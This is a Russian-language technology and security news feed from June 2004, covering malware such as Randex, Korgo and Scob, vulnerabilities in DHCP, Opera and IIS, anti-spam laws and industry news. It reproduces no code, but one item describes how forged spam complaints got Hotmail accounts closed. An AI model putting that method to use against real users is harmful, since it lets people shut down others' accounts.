27/06/2004 14:10 В США умер изобретатель байта и ASCII-кодов
В среду в техасском городе Поссум Кингдом Лейк в возрасте 84 лет умер от рака человек, стоявший у истоков современного программирования, Боб Бемер (Bob Bemer), сообщает Associated Press. Им или при его участии были созданы многие вещи в компьютерном мире, широко используемые по сей день. Кодировка ASCII, присваивающая каждому символу отдельный код, служебные последовательности символов (ESC-последовательности), обозначение их с помощью обратного слэша, язык COBOL и даже 8-битный размер байта. За свою карьеру Бемер успел поработать в корпорациях RAND, Marquardt, Lockheed, IBM, Univac, Bull, General Electric и Honeywell. В прошлом году Институт инженеров электроники и электрики (IEEE) наградил его медалью Пионера Компьютеров (Computer Pioneer Award). Бемер также впервые предупредил мир о компьютерной проблеме 2000 года еще в 1971-м. До вчерашнего дня на улицах городка можно было увидеть его машину с надписью на номере "Да, я отец ASCII", а его жена Бетти ездит на "Мерседесе" с номером "ESC KEY". Бемер родился 8 февраля 1920 года в городе Саулт Санта Мария (Sault Sainte Marie), штат Мичиган.
Источник

27/06/2004 13:02 WiMax встал на крыло
Головная отраслевая организация утвердила важный стандарт — спецификации беспроводного широкополосного доступа к интернету WiMax, дав тем самым толчок развитию технологии, которую считают ключом к дешевым услугам высокоскоростного доступа. WiMax представляет собой радиотехнологию, которая обещает двухсторонний доступ к интернету на большом расстоянии со скоростями до 75 Мбит/с. Ее сторонники утверждают, что WiMax позволяет передавать данные от одной базовой станции к другой на расстояние до 30 миль, охватывая территорию радиусом больше мили услугами доступа с полосой пропускания, превышающей возможности существующих DSL- и кабельных линий. Многие считают, что это приведет к снижению стоимости услуг широкополосного доступа для удаленных районов и откроет шлюзы для новой волны конкуренции между провайдерами — что приведет к новому витку снижения цен и активизации процесса вовлечения потребителей. WiMax, или Worldwide Interoperability for Microwave Access, — самая многообещающая из предлагаемых на сегодняшний день беспроводных технологий «последней мили». Операторы рассматривают WiMax как средство охвата услугами широкополосного доступа сельских или удаленных районов, куда по техническим, физическим или экономическим причинам трудно проложить кабель. А в городах продукты WiMax смогут взять на себя часть трафика, помогая высвободить тяжело нагруженные сети. WiMax будет взаимодействовать с другими стандартами беспроводной связи, работающими на меньшем расстоянии, такими как технология Wi-Fi, которая стала популярным средством доступа к интернету в офисе или дома. А со временем новый стандарт должен превратится в мобильную беспроводную интернет-службу, подобную таким службам для сотовых телефонов, как EvDO (Evolution Data Only).
ZDNet.ru

27/06/2004 11:59 Сетевой червь Randex открывает "черный ход" в систему
Компания Symantec обнаружила новую вредоносную программу Randex. Червь имеет размер 44032 байта и проникает на компьютеры под управлением операционных систем Microsoft Windows 2000, 95, 98, Me, NT, Server 2003 и XP. С целью обеспечения автоматического запуска при загрузке ОС Randex вносит соответствующие изменения в реестр, после чего начинает сканировать произвольные IP-адреса, пытаясь получить административный доступ к машине-жертве путем подстановки наиболее распространенных паролей. Кроме того, вредоносная программа соединяется с IRC-сервером xirc.raplegends.biz, позволяя злоумышленникам выполнять на инфицированном ПК какие-либо действия, например, организовывать распределенные DoS-атаки или воровать информацию.
Описание

27/06/2004 10:55 ФБР не успевает создать антитеррористическую компьютерную систему
Федеральное бюро расследований США не успевает закончить к установленному сроку новую компьютерную систему "Трилогия", которая должна будет помочь спецслужбе обрабатывать разведданые и тем самым отслеживать внутренние террористические угрозы. По информации сайта телекомпании CNN, ожидалось, что система, успевшая до своего появления собрать много похвал, начнет работать в конце 2004 года. Однако теперь высокопоставленные представители ФБР уже не берутся сказать, когда она будет закончена. "Трилогия" должна будет предоставить агентам доступ к огромной базе данных и позволить быстро обмениваться информацией. Директор ФБР Роберт Мюллер (Robert Mueller) утверждает, что благодаря ей сотрудники бюро смогут значительно лучше взаимодействовать друг с другом, где бы они не находились. Новая система предполагает увеличение пропускной способности внутренних сетей, что уже было сделано. Пересылать большие объемы данных теперь можно, но важный компонент "Трилогии" систему для отслеживания уголовных дел "Виртуальное досье" запустить пока так и не удалось. Вдобавок, все это время ее не только хвалили, но и критиковали и даже заставили ФБР откорректировать принятый проект.
Lenta.ru

26/06/2004 13:25 "Сисадмин тоже человек!" - конкурс для сисадминов и юзеров
24 июня на SOFT@Mail.Ru стартовал конкурс "Сисадмин - тоже человек", посвященный Международному дню системного администратора. Конкурс организован компаниями SoftLine и Mail.Ru. Конкурс проводится среди виновников торжества и среди авторов поздравительных открыток для сисадминов. 30 июля - День системного администратора. Профессия эта сложная, нервная, вредная. Для здоровья, конечно, а не для пользователей. Конкурс "Сисадмин - тоже человек" посвящен системным администраторам. Поздравлять их приглашаются все желающие. Это будет великое примирение сисадминов и пользователей. Сисадмины будут составлять самые изощренные жалобы на пользователей, а те утешать их поздравительными открытками :) Сисадмин в России часто отвечает за работу, не имеющую прямого отношения к его профессиональным обязанностям. Более половины сисадминов официально не называются системными администраторами. Поэтому к участию в этом летнему творческому конкурсу приглашаются также веб-мастера, администраторы баз данных и служб электронной почты, системные программисты, администраторы телефонных сетей и систем голосовой почты и других служб.:) Более подробно с конкурсом и условиями можно ознакомиться, посетив нижеприведённую ссылку.
О конкурсе

26/06/2004 13:02 Новый CD Beastie Boys устанавливает на ПК "вирус"
На сайте Security Focus появилось сообщение, в котором говорится, что компакт-диск с новым альбомом известной группы Beastie Boys при загрузке в компьютер незаметно для пользователя устанавливает "вирус". По предварительной информации, записываемые на машину файлы представляют собой своеобразную систему защиты авторских прав, не позволяющую создавать копии треков на винчестере ПК. Процесс инсталляции такой защиты достаточно прост. На оптическом носителе имеется файл autorun.inf, который автоматически запускается на выполнение операционными системами Windows. Естественно, при этом выполняются и все инструкции, содержащиеся в файле. Понятно, что владелец компьютера может сразу и не догадаться, что звукозаписывающая компания, в данном случае Capitol Records, безо всякого на то разрешения поменяла конфигурацию его машины. Между тем, на компакт-диске может действительно содержаться способная к саморазмножению программа, выискивающая другие системы, на которые можно было бы установить DRM-драйверы. Правда, запретить автоматическое выполнение файла autorun.inf не составляет никакого труда. Для этого достаточно просто держать нажатой клавишу Shift во время загрузки диска. Кроме того, данная функция может быть и вовсе отключена при помощи какой-либо утилиты для тонкой настройки системы. Тем не менее, один тот факт, что звукозаписывающие лэйблы самостоятельно решают за пользователей, какие программы и когда им устанавливать, уже достаточно неприятен.
SySAdmins.RU

26/06/2004 12:48 Борьба с DoS атаками в FreeBSD
На сайте ONLamp.com выложена довольно интересная и полезная статья Avleen Vig - системного администратора компании EarthLink под названием "Preventing Denial of Service Attacks", в которой рассказывается о том, как настроить ОС FreeBSD 4.x, 5.x для того, чтобы DoS атака если бы и не была предотвращена, то, хотя бы, принесла наименьший ущерб.
Cтатья

26/06/2004 12:16 Стоит ли сайт президента потраченных на него 6 млн руб?
Как мы сообщали ранее, уыидел свет (вернее, сеть) обновлённый сайт Президента России www.kremlin.ru. Сообщалось, что сумма работ по его оформлению, хостингу и т.д. составила около 6 млн.рублей (около 200 тыс. "американских рублей"). "Вебпланета" решила провести опрос среди российских студий веб-дизайна: стоит ли сайт президента потраченных на него денег? С результатом можно ознакомиться на сайте. Мнения в общем сводятся к тому, что цена явно (и существенно) завышена. Впрочем, глядя на "уважаемых" депутатов и коррупцию, насквозь пропитавшуюю наше общество, вряд ли это может вызвать удивление.
Результаты опроса

26/06/2004 10:34 Хакеры используют неизвестную уязвимость Internet Explorer
Вчера утром в интернете была зафиксирована необычная эпидемия, затрагивающая веб-серверы под управлением MS IIS5 (Microsoft Internet Information Server 5) и, затем, пользовательские компьютеры, посетившие зараженные веб-серверы при помощи Internet Explorer. Злоумышленники, предположительно, используют весьма нестандартный механизм заражения пользовательских компьютеров. Во-первых, они взламывают веб-сервер, работающий под управлением IIS5, и заражают его написанной на JavaScript троянской программой Trojan.JS.Scob.a (процедуры её обнаружения и удаления добавлены в базы данных Антивируса Касперского в ночь с 24 на 25 июня). Проникновение на IIS5-сервер, судя по всему, осуществляется через одну из старых или же неизвестную новую уязвимость. Затем, при посещении какой-либо веб-страницы на зараженном веб-сервере посредством браузера MS Internet Explorer, установленный на веб-сервере «троянец» перехватывает управление и обращается к веб-сайту, на котором находится специальный PHP-скрипт, использующий еще одну до сегодняшнего дня неизвестную уязвимость, но уже в браузере Internet Explorer. Наконец, за счет использования этой уязвимости, на пользовательский компьютер устанавливается одна из версий программы Backdoor.Padodor (модификаций w, x, y, z), предоставляющей злоумышленникам возможность полного контроля над зараженной машиной. Эксперты по информационной безопасности предполагают, что за новой эпидемией стоят спамеры, пытающиеся таким образом установить программы для рассылки спама на как можно большее число пользовательских компьютеров. «Лаборатория Касперского» рекомендует пользователям интернета временно воздержаться от просмотра веб-страниц при помощи браузера Internet Explorer. По имеющейся на данный момент информации, другие широко распространенные веб-браузеры (Mozilla и Opera) не подвержены этой уязвимости. Также, в целях профилактики, можно временно отключить исполнение JavaScript в настройках Internet Explorer. «Лаборатория Касперского» обращает особое внимание пользователей на то, что потенциально опасным может оказаться любой, даже уважаемый или хорошо им знакомый веб-сайт.
"Лаборатория Касперского"

25/06/2004 16:45 Сбой в работе "БиЛайна" вызван переустановкой программного обеспечения
Вчера утром абоненты сотовой сети "БиЛайн", находящиеся в центральной части города, остались без связи. Сбой выражается в том, что сотовый телефон "не видит сети". Кроме того, как сообщают СМИ, абонентская служба оператора сети в настоящее время недоступна. Пресс-служба компании "Вымпелком", представляющей услуги связи под маркой "БиЛайн", сообщила, что сбой вызван переустановкой программного обеспечения на коммутаторах сети. "Примерно в 7:20 среды мы зафиксировали сбой в работе сети в центральной части столицы. Без связи остались абоненты внутри Садового кольца, а также в районах Сокольников, Дмитровского и Ярославского шоссе. В настоящее время специалисты компании вместе с инженерами из французской фирмы Alcatel устраняют сбой", - заявил директор "Вымпелкома" по связям с общественностью Михаил Умаров. По его словам, связь должна быть налажена к полудню. В то же время, дозвон до абонентов, находящихся на окраинах Москвы, с городской сети МГТС осуществляется без затруднений.
"Компьюлента"

25/06/2004 16:22 Новая версия PlantVue
Специалисты фирмы "Фиорд" сообщают о выходе версии 2.5 SCADA-системы PlantVue компании ARC Informatique. Среди новых функций PlantVue 2.5 - увеличение набора используемых языков, поддержка сенсорного режима работы экрана и формирование виртуальной клавиатуры с идентификацией пользователей по паролям и значениям переменных, отображение переменных с возможностью многократной выборки, отображение и удаление таблиц и данных, управление правами пользователей. В PlantVue 2.5 (эта система совместима с PlantVue 1.0 и 2.0) устранены ошибки предыдущей версии. При работе со всеми операционными системами используется интерфейс Windows XP.
OSP.RU

25/06/2004 15:27 Сотрудник AOL продал спамерам 92 млн. адресов
Правоохранительные органы США объявили об аресте сотрудника компании AOL, подозреваемого в продаже 92 млн электронных адресов спамерам. По информации Reuters, житель города Харперс-Ферри Джейсон Сматерс (Jason Smathers) продал украденные им адреса интернет-маркетологу Шону Данавэю (Sean Dunaway) из Лас-Вегаса. Из-за сделки Сматерса и Данавэя клиенты провайдера AOL получили несколько миллионов спамовых писем. Данавэй, который также задержан полицией, продавал полученные адреса другим организаторам спамерских рассылок. Согласно положениям федерального антиспамерского закона, арестованным грозит лишение свободы на срок до пяти лет и штраф до 250 тысяч долларов. 24-летний Сматерс работал инженером в офисе AOL и имел доступ к базе данных с именами, электронными и обычными почтовыми адресами 30 млн клиентов компании. В ходе предварительного расследования выяснилось, что Сматерс рассматривал возможность рассылки спама клиентам AOL еще в апреле 2003 года. 21-летний Данэвэй продавал базу электронных адресов за 52 тысячи долларов в мае или июне 2003 года. Обновленная версия базы поступила к спамерам в марте 2004 года и обошлась им в 32 тысячи долларов. Самому Данавэю за покупку базы адресов у Сматерса пришлось заплатить 100 тысяч долларов. Информация о хищении базы адресов была выявлена AOL в начале этого года. «Мы глубоко сожалеем о произошедшем и тщательно пересматриваем механизм внутреннего обмена информацией в компании», - заявили провайдеры.
Viruslist.ru

25/06/2004 15:09 Шестой ежегодный фестиваль Linux в Калужской области (Россия)
Как сообщает сайт linux.ru.net, с 30-ого июля по 1-е августа 2004-ого года в Боровском районе Калужской области на берегу живописной речки Протвы пройдёт 6-й ежегодный фестиваль Linux. Количество участников фестиваля не ограничено, места под солнцем хватит всем. Организаторы фестиваля предоставят для его участников место для установки палатки, интересных собеседников,запас дров и проезд до места проведения от г. Балабаново. Все необходимое для проживания нужно брать с собой. Как то: продукты питания, туалетные принадлежности и наборы для развлечений (пиво? - примечание ньюсмейкера). Будут принимать участие представители ALT Linux, различных университетов, банков, коммерческих фирм и госорганизаций из разных концов России и СНГ. Возможно, в фестивале будут принимать участие представители IBM, Intel и т. д. (надо полагать, что представители Microsoft приехать... побоятся).
Подробности и форма регистрации

25/06/2004 14:29 Взлом украинского Вэб-сайта вэб-мастеров
Как нам сообщил один из посетителей форума, взломан сайт украинских вэб-мастеров. Вернее даже не сам сайт, а его форум. На чём был сделан форум - на настоящий момент судить тяжело, но, судя по заголовкам, возвращяемым Вэб-сервером - на PHP (хидер, возвращаемый сервером - Server: Apache/1.3.31 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2634 mod_ssl/2.8.18 OpenSSL/0.9.7c-p1 PHP-CGI/0.1b). Судя по всему, дефейс был произведён одной из арабских хакерских (?) групп, а может - это кто-то так шутит. :) На настоящий момент форум был в состоянии дефейса. В качестве авторов дефейса значится Team Work Xp10.
Страница взломанного форума

25/06/2004 13:57 Министерство национальной безопасности США предупреждает о масштабной интернет-атаке
Интернет-эксперты и представители Министерства национальной безопасности предупредили в четверг о масштабной атаке на многие популярные интернет-сайты, передает CNN. По предварительным сведениям, неизвестные хакеры воспользовались уязвимостью одной из последних версий Microsoft ISS. Пораженные интернет-сайты пытаются установить на компьютерах пользователей хакерские программы, позволяющие рассылать через них спамерские письма. Представители корпорации Microsoft пока что никак не комментируют происходящее. "Пользователи должны знать, что любой сайт, даже тот, которому они доверяют, может быть поражен и, следовательно, содержать возможно вредоносные программы", - заявили представители правительства. Эксперты сообщают, что, несмотря на большое количество пораженных сайтов, происходящее не очень повлияло на интернет-траффик. "Событие значительное, но влияния на функционирование Интернета не оказало", - заявил Маркус Сакс (Marcus Sachs), сотрудник Internet Storm Center.
Lenta.Ru

25/06/2004 13:32 Sun предложила разработчикам инструмент за $99
Sun Microsystems подтвердила, что в понедельник она начнет продавать свой инструмент программирования Java Studio Creator. Это ПО, кодовым названием которого было Rave, Sun выпускает для того, чтобы догнать по простоте программирования конкурирующие продукты Microsoft, такие как Visual Studio и Visual Basic. Sun надеется, что Rave привлечет к программному обеспечению Sun Java больше разработчиков. Java позволяет исполнять одну и ту же программу на разных компьютерах, будь то машины Linux, Windows или Mac OS X.Как и ожидалось, Java Studio Creator будет стоить $99 — об этом сообщил в интервью в четверг вице-президент по маркетингу Java-веб-сервисов и инструментов разработки Sun Джо Келлер. «Он предназначен для разработчиков, которые программируют между делом, а не ради основного заработка, — сказал он. — Одним из главных назначений этого инструмента является создание простых программ, извлекающих информацию из баз данных или веб-сервисов». В прошлом году, когда Sun демонстрировала Rave, Microsoft заверила, что она сможет удержать свои позиции на рынке инструментов программирования. В новом ПО Sun применяется технология Java Server Faces, позволяющая программистам легко вставлять готовый интерфейс пользователя в динамически создаваемые веб-страницы. На прошлогодней конференции JavaOne Sun заявила, что при помощи Rave она надеется увеличить число разработчиков Java с 3 млн до 10 млн.
Подробности

25/06/2004 12:47 Американские законодатели взялись за борьбу с "шпионскими программами"
Комиссия по энергетике и предпринимательству Палаты представителей конгресса США США одобрила законопроект, устанавливающий ответственность за распространение программного обеспечения, принудительно навязывающего пользователям свои услуги - так называемого "spyware" ("шпионское" ПО). Как сообщает газета Washington Post, законопроект получил одобрение подавляющего большинства парламентариев комитета. Согласно проекту, ПО запрещается устанавливать на компьютер без ведома пользователя. Нарушителей предлагается штрафовать на сумму до 11 тысяч долларов за каждый факт установки. По итогам рассмотрения комиссия по энергетике и предпринимательству направила законопроект на утверждение всему составу Палаты представителей.
Подробности

24/06/2004 22:00 Битва за Рунет отменяется!
К сожалению, госпожа Нарусова не появилась на съёмки Ток-шоу "К Барьеру!". Причины вполне очевидны (а может - так кажется). По-видимому, ей помешали проблемы по управлению республикой Тува (может, там был рекордный урожай зерновых). А жаль....
НТВ

24/06/2004 11:53 Уязвимость в протоколе DHCP
Gregory Duchemin и Solar Designer (создатель известного брут-форс взломщика JohnTheRipper, Openwall патча для ядер Linux etc.) сообщили о существовании уязвимостей в реализации протокола DHCP (система динамического распределения IP-адресов в локальной сети) от ISC. Первая из них (присвоен код US-CERT VU#654390) связана с некорректной проверкой границ буфера в функции регистрации (logging). Различные параметры имени хоста обычно формируются в единый массив и накапливаются в буфере фиксированной длины (1024 байта), если они содержат только ASCII-символы, при этом длина самого буфера не проверяется в передаваемыйх параметрах, что может (при передаче очень длинного массива опций имени хоста) привести к типичной ситуации DoS. Вторая уязвимость (присвоен код US-CERT VU#317350) связана с тем, что в некоторых реализациях ISC DHCP вместо функции vsnprintf() используется vsprintf(), что также может позволить потенциальному взломщику вызвать отказ службы DHCP. Уязвимости обнаружены в версиях ISC DHCP 3.0.1rc12 и 13, устранена в 14-й версии. Уязвимости подвержены многих *nix-подобные ОС. Необходимо отметить, что DHCP обычно используется в локальных сетях (если СИСАДМИН не зря свои деньги получает ;)) и, таким образом масштаб возможной атаки сужен до размеров локальной сети. Многими производителями уже выпущены обновлённые версии ISC DHCP.
Secunia

24/06/2004 11:37 Уязвимость в ОС Solaris
Компания Sun сообщила о существовании уязвимости в ОС Solaris. Проблема связана с ошибкой в базовом модуле безопасности (Basic Security Module, BSM), которая позволяет организовать DoS-атаку на уязвимую систему. Правда, осуществить нападение удаленно не удастся, в связи с чем дыре был присвоен рейтинг низкой опасности. Патчи для ОС Solaris версий 7,8 и 9 (платформы SPARC и х86) уже выпущены и доступны для загрузки на сайте технической поддержки компании Sun.
Патчи

24/06/2004 10:44 Законопроект США IICA запрещает P2P-сети
Новый законопроект, широко поддерживаемый влиятельными представителями демократической и республиканской партий в Сенате США, ставит популярные файлообменные сети, такие как Kazaa и Morpheus, вне закона. «Каждый, кто преднамеренно склоняет других к любым нарушениям» закона об авторских правах, может быть привлечен к юридической ответственности за эти нарушения. По существу, эта формулировка накладывает запрет на файлообменные сети и ставит под угрозу некоторые устройства потребительской электроники. Сторонники законопроекта утверждают, что он направлен на обуздание нелегальной деятельности в интернете. Опубликованный в среду законопроект «О побуждении к нарушению закона об авторских правах» (IICA) представляет собой очередную попытку крупных владельцев авторских прав законодательно положить конец «растущей угрозе пиринговых сетей, кишащих пиратскими музыкой, кинофильмами и ПО». Нарушение IICA будет караться штрафами, а в некоторых случаях и длительным тюремным заключением. Противники IICA — защитники гражданских свобод и операторы файлообменных сетей — встревожены тем, что выдающиеся политики обеих основных партий твердо поддерживают предлагаемые меры.
О законопроекте

24/06/2004 10:25 Как заставить Hotmail закрыть почтовый ящик неугодного пользователя
Интернет-почта Hotmail.com так активно борется со спаммерами, что от этого страдают обычные пользователи, собщает Maariv. Журналисты выяснили, что для закрытия почтового ящика ни о чем не подозревающего пользователя необходимо лишь сообщить в службу поддержки пользователей Hotmail о том, что с его адреса рассылается спам. В трех случаях, отслеженных журналистами, почтовые ящики были удалены в течение 24 часов после отправления жалобы без каких-либо дополнительных проверок. В двух случаях почтовые ящики были закрыты из-за того, что злоумышленники, рассылавшие спам через израильского интернет-провайдера, изменили заголовки писем таким образом, как будто спам рассылался пользователем Hotmail. В третьем случае журналисты Maariv создали специальный почтовый ящик, который ни разу не использовался для отправления писем. Затем с другого почтового ящика в службу поддержки пользователей Hotmail было направлено письмо с жалобой на спам, к которому были приложены заголовки старого спама, где адрес отправителя был заменен адресом созданного ящика. Вскоре служба поддержки пользователей Hotmail ответила, что жалоба рассмотрена и меры будут приняты, и созданный почтовый ящик был закрыт.
Подробнее

23/06/2004 18:23 Обобщение практики ISP по борьбе со спамом
Как сообщает opennet.ru, альянс ASTA (The Anti-Spam Technical Alliance), в который вошли Yahoo!, Microsoft, EarthLink и AOL, после года своей работы, опубликовал документ "ASTA Statement of Intent" с общими рекомендациями по борьбе спамом.
Документ в PDF

23/06/2004 15:03 Дуэль за Рунет назначена на четверг
Как сообщает в своём ЖЖ небезызвестный в Рунете Антон Носик (редактор новостного сайта Lenta.Ru и вообще человек, сделавший довольно много в популяризации Интеренет в России), по НТВ в четверг, 24 июня, в 22.35 по Москве в рамках ток-шоу "К барьеру!" состоится его дискуссия с не менее известной госпожой Нарусовой (сенатор от Тувы и вдова А.Собчака, входит в в состав комиссии по информационной политике). Предмет разговора - необходимость введения законодательных ограничений на распространение информации в Сети. Запись программы проходит уже сегодня, но исход дуэли, как обычно, будут определять в прямом эфире телезрители - при помощи телефонного голосования. Как известно госпожа Нарусова имея довольно смутные знания об Интернете в общем и о Рунете в частности настаивает на государвственном регулировании Интернета. Антон соответственно в телеэфире (к сожалению, не прямом - съёмки будут проходить сегодня) будет доказывать несостоятельность измышлений господ, подобных Нарусовой (достаточно вспомнить высказывания подобного толка со стороны мэра Москвы Ю.Лужкова). И хотя тема дискуссии не имеет отношения к компьютерной безопасности и результаты её вряд ли каким-либо образом повлияют на мнение "высокоуважаемых" депутатов, однако, думаем, сама дискуссия будет небезынтересна посетителям нашего сайта. Мы не предлагаем голосовать за кого-либо, а предлагаем просто послушать передачу и сделать собственные выводы.
ЖЖ Антона Носика
Cуть предложений Нарусовой

23/06/2004 13:52 "Президентский сайт" оперативно подвергли атакам
На создание новой версии президентского сайта было выделено из федерального бюджета 6 млн. рублей. Пока пользователи оценивали его удобства, хакеры проверяли на надежность сайт... www.putin.ru. Данный домен никогда не имел прямого отношения к президенту РФ. Изначально, на нем располагался почтовый сервис, на момент закрытия обслуживавший около 47 тыс. пользовательских аккаунтов. Вебмейл, возможно возобновит свою работу, но не ранее зимы этого года. Не так давно сайт возобновил свою работу, но уже в статусе информационного проекта. Как только стало известно о запуске новой версии www.kremlin.ru, на www.putin.ru обрушились "хакерские" атаки. За первые сутки сайт подвергся более 80 атакам, 70% которых имеют российское происхождение, хотя не исключено, что и оснтальные попытки взлома также велись соотечественниками через прокси-сервера (большинство атак, кстати, оказались тривиальным сканированием - прим. ньюсмейкера). Суть большинства атак сводилась к поиску дыр в защите веб-сервера. Как сообщило руководство проекта, ни одна из попыток злоумышленников не увенчалась успехом.
Internet.Ru

23/06/2004 13:31 Троян Hacarmy открывает черный ход в систему
Компания Symantec обнаружила новую вредоносную программу Hacarmy, сообщает "Компьюлента". Она может представлять опасность для пользователей ОС Microsoft Windows 2000, 95, 98, Me, NT и XP. После запуска троян копирует себя в системную директорию Windows под именем ipconfigs.exe. Далее ссылка на этот файл заносится в ключ автозапуска реестра, что позволяет вирусу автоматически загружаться в память при каждом старте операционной системы. Кроме того, троян Hacarmy пытается соединиться с IRC-сервером через порт 6667, что предоставляет злоумышленникам возможность выполнять на инфицированной машине произвольные действия, например, загружать и запускать какие-либо файлы.
Описание

23/06/2004 13:09 Мосгордума намерена защитить пользователей от спама
Мосгордума намерена защитить пользователей интернета от массовой рассылки рекламы, сообщает РИА «Новости». МГД выступит с законодательной инициативой о внесении изменений в некоторые законодательные акты РФ. Соответствующее постановление было принято в 1-м чтении на пленарном заседании в среду. Согласно предложениям МГД, не допускается использование рекламодателями сети связи общего пользования для массовой рассылки рекламы посредством сообщений электросвязи. Исключение составляют случаи, когда рассылка осуществляется с предварительного согласия адресатов. При этом рекламодатель обязан прекратить рассылку в адрес любого лица, которое обратилось с требованием прекратить рассылку. Массовой признается рассылка рекламы более чем в 2.500 адресов в течение 24 часов или более чем в 25.000 адресов в течение 30 дней. Как пояснил журналистам редактор проекта депутат Степан Орлов, любой гражданин вправе пожаловаться в органы Главсвязьнадзора на незаконное распространение рекламы, после чего будет проведена проверка лиц, нарушивших законодательство. Если нарушитель — юридическое лицо, он должен заплатить штраф от 500 до 1000 минимальных размеров оплаты труда (МРОТ). Для должностных лиц размер штрафа составит от 20 до 30 МРОТ, а для физических лиц — от 10 до 15 МРОТ. В отдельных случаях, отметил Орлов, например, если лицо, отправившее сообщение, скрывает свое имя и адрес или когда информация носит порнографический и нецензурный характер, а также содержит вирусы, нарушитель может понести уголовную ответственность.
РИА "Новости"

23/06/2004 12:23 Уязвимость в браузере Opera.
Некто под ником bitlance winter сообщил о существовании уязвимости в популярном браузере Opera, представляющим собой отличную альтернативу (как в части скорости, так и по функциональной полноте) браузеру Internet Explorer. Cуществование уязвимости позволяет подменить страницу, которую посещает пользователь поддельной (т.н. fishing атака), путём подмены в соответствующем поле браузера. Атака может быть проведена с помощью специально сформированной страницы в формате HTML, обработка которой приведет к отображению неправильного URL в адресном поле. Наличие уязвимости подтверждено для версии 7.51. Патчей в начтоящий момент не существует.
Secunia

23/06/2004 11:51 Тайваньский «троянец» атаковал южнокорейские министерства
Группа хакеров атаковала ресурсы шести государственных агентств Республики Корея. По информации газеты The Korea Times, в числе подвергнувшихся нападению объектов оказались два исследовательских института Министерства обороны. В качестве «оружия» хакеры использовали троянскую программу Peep и заразили ей 64 компьютера. Среди инфицированных машин оказались компьютеры Агентства по развитию обороны, Корейского института оборонной аналитики, Корейского исследовательского института исследований в области ядерной энергетики, Министерства по делам водных ресурсов и рыболовства и Администрации по делам малого и среднего бизнеса. «Как только мы заметили, что ряд правительственных компьютеров оказался заражен троянской программой Peep, мы приняли экстренные меры. В настоящее время возможность утечки данных ликвидирована», - заявили представители южнокорейского Национального центра по кибербезопасности. Специалисты по борьбе с компьютерными преступлениями закрыли хакерский сайт, распространили среди агентств антивирусное программное обеспечение и обновили версии межсетевых экранов. Между тем, сотрудники атакованных агентств никак не прокомментировали вопрос о возможной утечке секретных данных. В базах данных Агентства по развитию обороны и Корейского института оборонной аналитики хранится большое количество материалов о разработке систем вооружения. С целью предотвращения других хакерских атак Национальный центр по кибербезопасности намеревается усовершенствовать мониторинг активности в сети.
Источник

23/06/2004 11:09 Apple строит следующий суперкомпьютер
Заказчик из военного ведомства приобрел за $5,8 млн систему Apple Computer, состоящую из 1566 серверов, — аналог академической системы, побывавшей в первых строчках списка самых быстродействующих компьютеров. В понедельник фирма Colsa (Хантсвилл, штат Алабама) объявила о том, что она покупает для моделирования аэродинамических процессов, возникающих при полетах со скоростями, значительно превышающими скорость звука, систему MACH 5 — более крупную, чем System X с 1100 двухпроцессорными рабочими станциями Power Mac G5, которая в ноябре заняла третье место в списке Top500 самых быстродействующих суперкомпьютеров. System X, исчезнувшая из последней версии списка Top500 по причине ее модернизации, демонстрировала производительность в 10,3 трлн операций в секунду, или терафлопс. Система Colsa, состоящая из двухпроцессорных машин Xserve G5, которая должна быть построена и введена в эксплуатацию этой осенью, обеспечит производительность около 15 терафлопс, обещает продакт-менеджер Майк Уитлок. Успех Apple во многом объясняется тем, что она использует процессоры IBM PowerPC 970, считает аналитик Illuminata Гордон Хафф. «Программное обеспечение Macintosh и хорошие средства управления из OS X тоже внесли свой вклад, но производительность процессора, безусловно, служит решающим фактором, — говорит он. — PowerPC очень быстрый процессор». MACH 5, что означает Multiple Advanced Computers for Hypersonic, G5, займет 42 стойки и 56 кв. метров площади, говорит исполнительный вице-президент Colsa Энтони Дириензо. Он утверждает, что Apple выиграла тендер, в котором участвовали шесть компаний, но конкурентов назвать отказался. Одно из отличий MACH 5 от System X заключается в сетевой системе, соединяющей отдельные серверы друг с другом. Если в System X применяется высокоскоростная технология InfiniBand, то MACH 5 использует более привычную Ethernet 1 Гбит/с. По словам Дириензо, динамические модели, которые будет рассчитывать Colsa, требуют не столько быстродействующей сети, сколько высокой обрабатывающей мощности узлов.
Подробности

22/06/2004 15:20 Прекращение поддержки SuSE 8.0
Roman Drahtmüller от имени разработчиков дистрибутива Linux SuSE объявил о прекращении поддержки версии 8.0 с 1 июля 2004 г. Все обновления по безопасности, обнаруженные после этой даты для версии 8.0 (2-годичной давности), выпускаться не будут. Все пакеты из ветви 8.0 будут перемещены в директорию /pub/suse/discontinued/ для освобождения места для версии 9.1. Поддержка всех более поздних версий будет осуществляться согласно объявленному компанией плану 2-х годичной давности.
SuSE

22/06/2004 14:45 Новая версия червя Korgo
Специалисты компании Network Associates обнаружили новую модификацию вредоносной программы Korgo, распространяющейся через дыру в локальной подсистеме аутентификации пользователей операционных систем Windows. Функционально Korgo.Q практически не отличается от предшественников. В частности, после попадания на компьютер червь изменяет записи в реестре с целью обеспечения своего автозапуска при включении ПК и открывает порт 80, через который затем отправляет запросы на ряд веб-сайтов. Таким образом, вероятно, авторы пытаются вывести выбранные онлайновые ресурсы из строя. Кстати, в списке "жертв" Korgo.Q присутствуют, преимущественно, русскоязычные интернет-страницы: asechka.ru, citi-bank.ru, filesearch.ru, goldensand.ru, mazafaka.ru и др.
Описание

22/06/2004 13:59 Закончилось действие патента на использование формата GIF в Европе
Разработчики Англии, Франции и Италии могут наконец отметить завершение действия патента на использование формата GIF; действие патента в Европе прекратилось 18 июня 2004. Разработчики Японии смогли присоединиться к ним спустя пару дней, где действие патента истекает 20 июня 2004. А Соединеные Штаты могут отпразновать уже годовщину этого события, т.к. патент для US истек год назад: 20 июня 2003. Нужно заметить, что патентом защищался метод сжатия Lempel Ziv Welch (LZW), используемый не только в GIF изображениях. LZW сжатие используется в TIFF-LZW, PDF, Postscript-2, и V.42bis-сжатии для модемов. Теперь, когда действие патента истекло в США, Европе и Японии, по всему миру можно свободно использовать GIF формат и встраивать LZW алгоритм в свои программы.
Источник - http://www.theinquirer.net/

22/06/2004 12:16 Эксплоит уязвимости Symantec Enterprise Firewall
Как мы сообщали вчера, Secunia опубликовала информацию об уязвимости в кшэрующем DNS-сервере в составе Symantec Enterprise Firewall (версии 8). Опубликован PoC-код, написанный на C++, позволяющий на локальном сервере запустить фальшивый (неавторитетный для зоны) DNS-сервер, позволяющий выполнить атаку на кэширующий DNS в составе Symantec Enterprise Firewall.
Описание и исходник

